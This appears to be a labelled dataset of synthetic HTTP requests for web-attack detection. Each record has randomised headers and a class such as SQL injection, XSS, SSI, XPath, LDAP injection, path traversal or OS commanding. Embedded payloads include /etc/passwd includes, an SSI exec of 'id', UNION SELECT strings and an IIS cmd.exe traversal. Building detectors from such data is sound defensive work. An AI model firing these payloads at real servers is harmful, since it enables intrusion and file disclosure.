User-Agent: hmgNcunu/4.3.7.2.6
UA-Disp: 348,337,32
UA-Color: color16
Via: 7.3 www.zwtEe0n.png, 4.0 163.77.139.117
Transfer-Encoding: identity
Upgrade: eMe/4.0, mna/3.4
X-Forwarded-For: 96.52.7.71
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nahhrm=626355&tT=290323

End - Id: 48174
Start - Id: 39500
class: SSI
GET /Qg7GOlIIHlogjYYEO/fQGyG_Nw/tLMU8G_f/8ei08ugnnS/r1U/npioxsi6y6W/oaIuctnoq0cpTdltk/do2Kh/tw49mvV/eZq/okbz5cKmU.php?1passwdxwgetE=%7C3e&tN4=ttInNwnahea&de=5109&aotssFalr4=sig9Qa&haaiwNHoit=15249&rdr3tht6nDa2ib=ousrcFp%27%5C+lhg%2Bwp-Ttrh&eXtIneamheonoo=7&ado=raga HTTP/1.0
Host: www.isteeeakbt.org
Connection: mesu
Accept: application/x-tar, text/xml
Accept-Charset: *
Accept-Encoding: compress, compress
Accept-Language: <!--    #include  virtual="/etc/passwd"   -->
Cache-Control: no-cache
Client-ip: 1.51.177.234
Cookie: VdBS=kuayr;t4m7leiiemb=X0apik8lo;aBnsa3ne=ocy2XYHiCRj
Date: Tue, 11 Sep 07 01:30:48 CET
ETag: W/"WZNJPRVhwKs5WbH1Gdm"
Expect: 100-continue
From: el2u@0la399.com
If-Modified-Since: Sat, 09 Oct 04 03:54:02 CET
If-Unmodified-Since: Sun, 25 Jun 06 21:31:58 UTC
If-Match: "qFJ-x7JYvJeq9BC6VSpW"
If-None-Match: *
If-Range: Fri, 11 Nov 05 14:55:12 UTC
Max-Forwards: 82
MIME-Version: 4.9
Pragma: g='aoeyp'
Proxy-Authorization: Digest username="93aYenr"
Authorization: Basic d29IZjphYTJz
Referer: /atknter/aw027eft/sciheasu/hoirwqst.zip
TE: deflate;q=0.2
Trailer: Authorization
User-Agent: eWA7oFh http://www.oebmh0a.com
UA-OS: Linux
UA-Color: color16
UA-Pixels: 296x5456
Via: FTP/4.4 201.78.32.8, 19nOz/6.3 www.tacl2Yt.png, HTTP/3.3 204.255.215.39
Transfer-Encoding: bavrx
X-Serial-Number: 5484485969570755
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39500
Start - Id: 48997
class: XPathInjection
GET /iS3B7KohdBeYMsXe/sw/tl/oiptorlOamlb/ou1nDw/GTrSAB/eaeta/loerfhrano2u.html?aphtDaswejh=Om+lT&deBvbscript@fI=%5Ddsls&lrtlrreZ=ulMqn&tytoqlEiRoacsv=99&nriay=EE%27+++++or+6+++%3C++++count%28path%2Fchild%3A%3A*%29+or+++++%27rntyam%27++%3D%27&riSkeocliuef=%29Yeye-eae%7Cffodlxmlj HTTP/1.1
Host: www.njtZm0tMmt.com
Connection: keep-alive
Accept: audio/*;q=0.1, application/x-tar, video/*;q=0.6
Accept-Charset: iso-8859-4, windows-1257
Accept-Encoding: *;q=0.5
Accept-Language: srljoc-sraure, roPnk-6oit4, os3rw-suif7, emekw1sd-d;q=0.8, jTeud-1ze2fdur
Cache-Control: no-transform
Client-ip: 227.105.165.38
Cookie: s1elcsr=4
Cookie2: $Version="6"
Date: Sat, 22 Aug 09 11:59:02 UTC
ETag: W/"-.OXjC_5aOfFkoC9vZ07"
Expect: 100-continue
From: yriAeeon@iwtteeent.st
If-Modified-Since: Tue, 25 Dec 07 20:50:49 UTC
If-Unmodified-Since: Sat, 01 Aug 09 13:21:54 UTC
If-Match: "IzwC84_hhPeqhlgrf1"
If-None-Match: "rrne0Z.FxpwyDb6@Eo8"
If-Range: *
Max-Forwards: 3332
MIME-Version: 9.9
Pragma: dnll='tle'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: NTLM bmU2b2lzeXM3QXR0ZHkzaWxmbnUyM09hcmlvYW43dElubmRJcnA=
Range: 468-8399
Referer: /si5gSia/rO4tr/htyhl.tar
TE: deflate;q=0.9
Trailer: Range
User-Agent: x.Fio6P7X http://www.1oorxsi.org
UA-CPU: 68000
UA-Disp: 3103,4052,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 146x384
Via: HTTP/2.4 www.eBblsOit.html:0
Transfer-Encoding: compress
Upgrade: ooldn/4.6, Lt8g/4.6, eeaos/4.4, en1qst/7.3, omia/8.0
Warning: 563 234.105.17.162 "anhi3" "Tue, 17 Nov 09 08:19:31 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48997
Start - Id: 46172
class: PathTransversal
GET /cOemnDNArIsIhxEyF-IN/shl5eEfnoDn/i5sFheSeA/iwkGXGtR2g6ynS_34zk/maju1eaaonemee3hoRor/positionn3EvWand9@Tm6E.html?rab9taAh=rQNlMvB&nhrrbonema=sRCgAB&iWlcsz=ei8WqaoL4zF&atenaA=nonssgn&kdGmSC=hmn7&Q3BOJjiPD=e7J&1aLLenertC=iwIu%40RU2R3G&nfpU4rZat=xolibuAt&sen4=nsntiiAgeSitqshN&yIeiguasCb=n%3A%2F.htaccess%7E&neP=owgetSm%24htpass+jhtmi&eCmirneiddh=yt1ssenNmeor&ec=sf3rataej4t&AysedN=5 HTTP/1.0
Host: www.scsf7.ch
Connection: keep-alive
Accept: audio/basic, video/*;q=0.4, audio/basic;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=00
Client-ip: 200.242.126.46
Cookie: ysht=ue;enycdvosodison0=901902067;e0heoceuxZg=rebn;uh3rxIe5iPr=dtrpsfazsxhuniono];innchi4o=ean1lboot.inioeta;go1uaIlsu5=23722
Cookie2: $Version="251"
Date: Tue, 18 Aug 09 02:32:08 UTC
ETag: "XxIGPTgMgE9f0ZK"
Expect: 4pnWf5e
From: e6aS@otptT.st
If-Modified-Since: Tue, 20 Jul 04 17:34:08 CET
If-Unmodified-Since: Thu, 24 Nov 05 03:11:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Aug 05 16:21:52 CET
Max-Forwards: 5619
MIME-Version: 6.1
Pragma: N4ata=s
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: Digest nonce
Range: -51066
Referer: /hvbhowmH/tiimr.bin
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 1.3; ee-ni; rv:2.4.1) Gecko/17525355
UA-CPU: StrongARM
UA-Disp: 9067,415,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 4.1 146.144.144.133, 0.1 164.255.104.247, HTTP/9.4 137.133.162.157
Transfer-Encoding: lOhpt; riWr=qoAnt4y
Upgrade: Dnac/5.1, hoA/3.8
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46172
Start - Id: 39211
class: SSI
PUT /pgm/sm42HzL_@Y54/sm6rWGsQjbsPkWHUM/o7Nwsio/saa1hl4as/fY/osiyeRtat4afE.cgi? HTTP/1.0
Content-Length: 319
Content-Language: 0iao2
Content-Encoding: identity
Content-MD5: ZXNFYnNvdXIxSGNlZGNycg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 22 Oct 06 13:20:24 UTC
Host: www.hslggo.gov
Connection: iwbss
Accept: audio/x-wav
Accept-Charset: x-mac-hebrew;q=0.4, iso-8859-6
Accept-Encoding: 
Accept-Language: aaeeLp-hd5esdba, tplnfyer-toda;q=0.4, ydrfgtrA-cyem;q=0.2, oLbr-eseSnohs;q=0.1
Cache-Control: no-store
Cookie2: $Version="9"
ETag: W/"yWtCdWDxCwfSmeHFrxx5"
If-Match: *
If-None-Match: *
If-Range: "65qrkqp7hJYGhgdo"
Max-Forwards: 5
Proxy-Authorization: rTnlii stmi=namTcnnr
Authorization: 0kpx r2yerr=edehOn
Referer: http://72addif.biz/e7ytqh.mp3
User-Agent: ezAZNDzUNS http://www.dFesgmii.fr
UA-CPU: Sparc
UA-Pixels: 8546x0268
Transfer-Encoding: deflate
Upgrade: rtsnd/8.0, EPe/0.5, ifwEjo/6.1, Gcurl/2.9, oebc1t/4.1

ceHtlcoe=eAnU0Jok4rM&Rv7gq.tXLowE=5&odedc0aesuh=895&7q=bbUM.P&smeyhnkm=05903&OMQ6@D0RN5E=ursne|dao6tiNom&haferrlnnSsrA=6189362&icC=Tbebe6trewnidsbank&tTd=$oselect&tsI6psg&AZ_AdAqj=<!--#echo var="date_gmt"-->&fnniamo1hxdiimU=uuihtaccesK&ip2striu=e4dtalm&1dropA4Id6h0ID5=tdnemyaborirhtaccesronlfrchild

End - Id: 39211
Start - Id: 40136
class: SSI
GET /jkYj1IJmRJO5k4/2e2.php?9p8SLchildGecho4=7%24ns7aeSods&A0X.B9mwp-aKkl=%3C%21+++++%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E&l8QTIscript=ibetweenoqaEro HTTP/1.1
Host: www.r4iin7mNoh.biz:80
Connection: ytfN
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: AHiei4r-epe, o-we;q=0.1
Cache-Control: min-fresh=574
Client-ip: 246.182.239.2
Cookie: pssrusateU4=yirvbscripts;Meeobat=;p;6JaWexecMRpasswdsystempassthru=olibn;7EnkoLSeto=114522;bXF3xp_=ecmdm4ec'so;bamk3=45
Cookie2: $Version="8"
Date: Sat, 17 Sep 05 19:57:26 CET
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: hthq3df@t0rsnSoda.org
If-Modified-Since: Fri, 17 Dec 04 11:32:53 UTC
If-Unmodified-Since: Mon, 08 Aug 05 07:18:48 UTC
If-Match: *
If-None-Match: "epZvrM3VuYc5TvvgPQQC"
If-Range: "peaBNeIxgmeh631w"
Max-Forwards: 6
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: Basic Y2VhQ3R0djpzZGVFc2M=
Range: 86-29827,480182-539278,773981-8539
Referer: http://bqmro.net/hegca/tald/itgmf0/cEns/bt1siug.css
TE: chunked;q=0.7,chunked;q=0.4,trailers
User-Agent: eGre (uc5URQ; rWy4ndto; sk3RuG)
UA-Disp: 5908,939,32
UA-Color: color32
UA-Pixels: 844x123
Transfer-Encoding: identity
Warning: 529 181.61.46.190 "ahfaa4issh1dihO" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40136
Start - Id: 38784
class: LdapInjection
GET /h6Sg5/ibUYYPAmRF3X10SQn/s5.9muGOm/tUXte89/aIdiknksd/iaenywerbhan7/edd3/nEbKvjTNoB4DIHjER/g1zp/Jxg/on/ctLi19fd151W24dZ5f.asmx?NXEY1RAdA8=165&sEsgsF=%29++%28%7C%28displayName%3Dhad*%29%28name++++%3D+++had*++%29%28mail%3Dhad*++%29&ssperGu6axouma=ly7+ighr++nlch HTTP/1.1
Host: www.q6ed7o.it
Connection: close
Accept: image/*;q=0.3, audio/*
Accept-Charset: iso-8859-9;q=0.0
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 103.114.5.31
Cookie: ra5eethod1nw=lBa;Nor-giUgR@autoexec=81080648;Iuis3=dSyKw@Ss88z;Oa6aioi=92;ovEmaMsrtdihcep=ryI
Cookie2: $Version="919"
Date: Thu, 05 Apr 07 07:36:33 CET
ETag: W/"saFjXR8ldmH5p5Akw0"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Wed, 04 Jul 07 10:41:14 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "eN33gtGBouoX8Cdp3I.a"
If-Range: *
Max-Forwards: 019
MIME-Version: 3.1
Pragma: trl='c54Efa9'
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: NTLM OGU0b1J0bWd2YXJlZW9lbmlXdVM0YnVvdXRrdzVzenl5bzNsaXBvOA==
Range: 777808-9828,-9730,-076
Referer: http://www.e8dlp.uk/6yu2/arugmce/rluatfs/j8ae/rasxe1Go.mdb
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 4.6; kt-dn; rv:3.2.8) Gecko/43767527
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: FTP/7.7 93.105.165.99, HTTP/6.7 238.93.211.162
Transfer-Encoding: compress
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38784
Start - Id: 36020
class: PathTransversal
GET /Tsnotrssaipe/mZbTd/ngfcFubzMgAft/EfDCd43kaW/1Y259mAV.c3Dy74IuC/ser/tfwiqe7gsnewre/hamnkrtuysfhtge/u@0Y6YXYc31e3M/kvG/aeemncsEepz9rn3iu/sl_V87vrwGmY.jpeg?fvareztasrpB=7%3A%5Cwinnt%5Cboot.ini&etroRtp4ao=aimgua%7Ettreep&l8=300132&fGqc=97661792&eEnoeeulenafpJr=Nlt5teopengbetween0ao HTTP/1.1
Host: www.as3fj.fr
Connection: qdN0
Accept: */*
Accept-Charset: koi8-r, hz-gb-2312, x-mac-greek;q=0.4
Accept-Encoding: identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 236.32.209.129
Cookie: Ed2ses=142;t8Ovtt1enenaat=wtSohd;ls9daovesatcMAe=en i;dneesiei067=tQbm
Cookie2: $Version="1"
Date: Mon, 05 Dec 05 01:56:34 UTC
ETag: "1a58EMborIstQSXjUbu@"
Expect: ynaht
From: e1ea@teeopdrn.uk
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: *
If-None-Match: "8Xe4YpSVMFzaxu7"
If-Range: Mon, 15 Feb 10 16:43:32 GMT
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Basic aDZweXRoZTpCbDFpZXhheg==
Range: -05066,-92,-024075
Referer: /evsa8ti.bin
TE: chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/8.3 (X11; U; Linux i386 8.8; dn-ah; rv:0.8.9) Gecko/15765117
UA-Disp: 097,2396,8
UA-Color: color8
Via: 1.5 0.35.153.4:117, dnR/5.7 248.98.233.112, FTP/7.8 85.169.36.74
Transfer-Encoding: deflate
Warning: 366 209.231.92.237 "1njhsgaZmEo" "Fri, 29 Feb 08 20:21:14 CET"
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36020
Start - Id: 46361
class: PathTransversal
GET /lg91/lqWtV3zFZtuc/GJgWicatkGDK/ttdiIe.html?ste=saoaouldrsk9eb&S4sO%u=355&nDoSsSfn4hMdtcs=n9eea&logTTQUUXIx=ooao&8aOg=%2Fetc%2Fpasswd&yO6rgtzx7to5=9%26l&aa3fsaksi=yg%5Dicele6itohne&ah=2479&aa=nemceaInlm9Nt&eolDTa=8&tM0oeii6sb=M%3E&9sr8yrnLtho=el+&eouztwc0oo8=nmn6bpogeo2iewRiea&tcfdrrb=%40t%7E HTTP/1.0
Host: www.seaess.net
Connection: uTtip
Accept: video/mpeg;q=0.9, application/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.7, identity
Accept-Language: e5ertiet-anoxTEyi;q=0.8, tat3tpsx-jcOlics;q=0.1, hilec-en;q=0.3, reeesS-eat7BI;q=0.9
Cache-Control: max-age=0
Client-ip: 191.28.125.93
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="64"
Date: Wed, 10 Nov 04 23:37:44 UTC
ETag: W/"7@bC0aVLxbOjP6v"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Mon, 15 Oct 07 01:00:37 CET
If-Unmodified-Since: Mon, 17 Mar 08 17:53:02 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Dec 06 21:55:11 CET
Max-Forwards: 10
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Basic bDVleTpuZW9lb3Rv
Range: 405245-17797
Referer: http://yOmsnsea.gov/secj.gz
TE: chunked,deflate;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (Windows; U; Win98 8.0; em-ae; rv:4.5.7) Gecko/72753705
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: 3.1 196.194.220.30
Transfer-Encoding: identity
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46361
Start - Id: 46798
class: XSS
POST /ioeulo8IetcTVitggwce.html? HTTP/1.1
Content-Length: 303
Content-Language: aeast,8eyeo
Content-Encoding: gzip
Content-Location: /ifin/Axchsa.exe
Content-MD5: NXBZdG8yM2llSXI1ZG9pYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 17:55:29 GMT
Last-Modified: Sun, 25 Jun 06 18:23:52 CET
Host: 206.153.24.222:314
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew
Accept-Encoding: compress, compress;q=0.8, compress
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 163.182.220.152
Cookie: titod=sx5
Cookie2: $Version="55"
Date: Sat, 10 Dec 05 01:03:51 GMT
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: o6sRe3
From: rrxr@antg6tman.st
If-Modified-Since: Fri, 28 Oct 05 12:35:51 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 8922
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM dWVocnJhaHRiN2ZuUXdkbUl0bXVhbnZxR2hjb2VhYnl3ZDJxYw==
Range: 15-86
Referer: http://www.eRaobl.com/rrht/uMAoarT4/dln5elf/Flonhqga/tDb3xla.asmx
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Rabmmsto (bB8UNI)
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 818x5674
Via: Hosrl/1.4 www.n0mepn.htm, FTP/4.1 www.te9iuor.tiff:8386
Transfer-Encoding: uyqu; rjvr=yed1
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

dxotgmjilDba=i~&iTADutxkra2=&{[alert    ('Aoutozse');]};&6ertehizehuhona=177937230&Hs6rulUotvhen=fromeie&dh=43171&aenrb=lt=8i7ay6fa&on=~qg[ao-iidz&egki=logi6Sg9xpeSien<&TROb8x=mcleue2ns2&M0cTd= &Lnn=e ni]t script""btntr&gFUmMC=libaz7&ezRA=lwindow.openryr&bu4a=dsamt

End - Id: 46798
Start - Id: 49199
class: XPathInjection
GET /0Ibfn3uossWhzy/ttoosn/j5Adz/rocCoihez/aeetF6helhtsl/wjtfrombunionf/rjesEg3/i97HWCSc7_vz/tC42.cfm?2i5=daiiihf&_ZN6p=nre&xEVT=90+or+++++1%3C+iyR3e%2Frmml%2Feopwn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D50%5D++or+++++592%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&aen=O&oeclcmlOtsoo=oiedotusrtmocha+oSne+tA&iidornliecg=3919&se=%7EmjnhsE0%5D&creh=5yjxzLriq2m HTTP/1.1
Host: 251.225.41.225
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bc-rnrnmte4
Cache-Control: fu='tu1nzsrw'
Client-ip: 254.208.202.91
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Sun, 15 Jun 08 15:30:33 CET
ETag: "ruPgw4wQy@KHv4cvV"
Expect: wlenof
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Thu, 18 Nov 04 17:37:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 3013
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: Digest nonce
Range: 943272-69165,-532,868-6
Referer: /ma6eh/ogEhopa0.mdb
TE: trailers
Trailer: Authorization
User-Agent: lalclohn (6sLZLxS4c)
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 3.0 164.15.193.254:1147, FTP/2.8 www.cme8.jpeg
Transfer-Encoding: compress
Upgrade: awna1h/3.9, fneo/6.3, ayJ7mt/6.9
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49199
Start - Id: 43980
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 177.36.36.237:8561
Connection: h4oOcir
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.18.187.245
Cookie: fvpoqEtsiueneUu=whered;tw8oweoscmo=aa5zuweiy1-oV;eaxGusbb4etreS=icsmg5dDU02
Cookie2: $Version="54"
Date: Thu, 10 Aug 06 17:19:39 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: lwca=m8sg;eeCw
From: diou@el22.cz
If-Modified-Since: Tue, 12 May 09 12:43:34 GMT
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: *
If-None-Match: "SErLrC-h0mfVzu5J."
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic Z2Rpb25vcXk6aEl0MFVwc3I=
Range: -2,795-,-91
Referer: http://pZso.net/7nlt/aseR.cfm
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.6 (X11; U; Open BSD i586 2.1; cr-ee; rv:7.2.6) Gecko/98096000
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2346x026
Via: 2.6 www.0ixttae.png, 4.0 142.223.244.108:76143, 2.0 www.asaur.gif
Transfer-Encoding: nret
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43980
Start - Id: 41481
class: SqlInjection
POST /h09darhacawo8do/sXB1T42k0GVdmgV/nnlehtswt.css? HTTP/1.0
Content-Length: 184
Content-Language: oJhyuprn
Content-Encoding: gzip
Content-Location: http://www.nlih.st/eoeuce/osgts/ttnzm.ace
Content-MD5: bmVvdW9lc250Y3NxYXVpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Wed, 21 Dec 05 14:23:57 GMT
Host: 62.113.153.238:02067
Connection: oedh
Accept: application/zip;q=0.7, video/mpeg;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: 0shohss-n9tasd;q=0.9, Eg-omcey
Cache-Control: min-fresh=266
Client-ip: 72.144.102.56
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="5"
Date: Thu, 02 Apr 09 23:06:00 GMT
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: 100-continue
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Wed, 30 Jun 04 06:07:35 UTC
If-Unmodified-Since: Sun, 06 Feb 05 16:59:08 UTC
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: "NGZN@PIl7RTt_FLnOms"
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 86
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest nc=D8beEDfb
Range: 78-403185
Referer: /suUut/y7xasant.tiff
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: halhewre7Deassd44N
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8426x777
Via: 8.6 www.ln6oeh.css, FTP/2.5 161.76.234.172:0, FTP/1.8 www.ctaT.html
Transfer-Encoding: compress
Upgrade: duea/0.0
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cdub0BtIE=clqrOete9tuay&niznncvgl9Fh=tspd5Cdesr9aoof&ci58Yelrh8Hi=-@insertcNeTe7mqperl&e50=as1V&onAh=707642&aah=eeloGuE&reanmwi='     group    by   users.id having    68508=68508

End - Id: 41481
Start - Id: 42459
class: SqlInjection
GET /hlxnF60.Os/dne3fenysveoctetibse/obnd.swf?qpmnntas1p=9bqJIHHOFyPK&FfEDZmh.=%27++%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F3%2F**%2FFROM%2F**%2Fend2ohnnWo%2F**%2FWHERE%2F**%2F%28++++%27%27%3D+%27++%2F**%2F&pedi=s64%3Cno HTTP/1.1
Host: www.acsffcn.uk
Connection: keep-alive
Accept: video/*, audio/*;q=0.1, video/*;q=0.5
Accept-Charset: iso-8859-3, x-mac-icelandic, iso-8859-5, x-mac-turkish;q=0.2, cp-932
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 13.69.56.93
Cookie: 5rfeqtE=aooopeea 8de q;iipbntonnxelez=fsock_streama;nrmejHsmh3kRlDm=ipasswdCscat;mi8en=)deoeqxp_<ngjFtrC
Cookie2: $Version="3"
Date: Wed, 11 Jun 08 05:09:18 CET
ETag: "qpEgOLwaqcuuIaJS0f8"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Sun, 19 Sep 04 03:50:54 CET
If-Unmodified-Since: Mon, 07 May 07 16:26:46 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 8530
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: Basic ZmU2b3NpZW46bmJwdDdlMw==
Range: -9
Referer: /onTCgo/tefq.swf
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.8 (compatible; MSIE 3.7; Mac OS X; 1tekf1aa)
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: sfet/4.5 www.eLOhsoj.gif
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 574567754776356
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42459
Start - Id: 45869
class: PathTransversal
GET /vWV1Ex6bU7SIEfE/ran0urpca/nR@wbfM-Xo@AnDUI.cfm?tointmnhznrbs=fo%3Et+++wheree%25ktd&cxNlter=efdnhnan&etmrLhDp=6rreh5em&l6_rvwto=eih7togmail%3A&rh7lwmrxc=1&ScatD1Vnt=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&IatkEty02newf=1%7EnlIdnwEst%3FF HTTP/1.0
Host: 130.18.224.17
Connection: close
Accept: */*;q=0.2
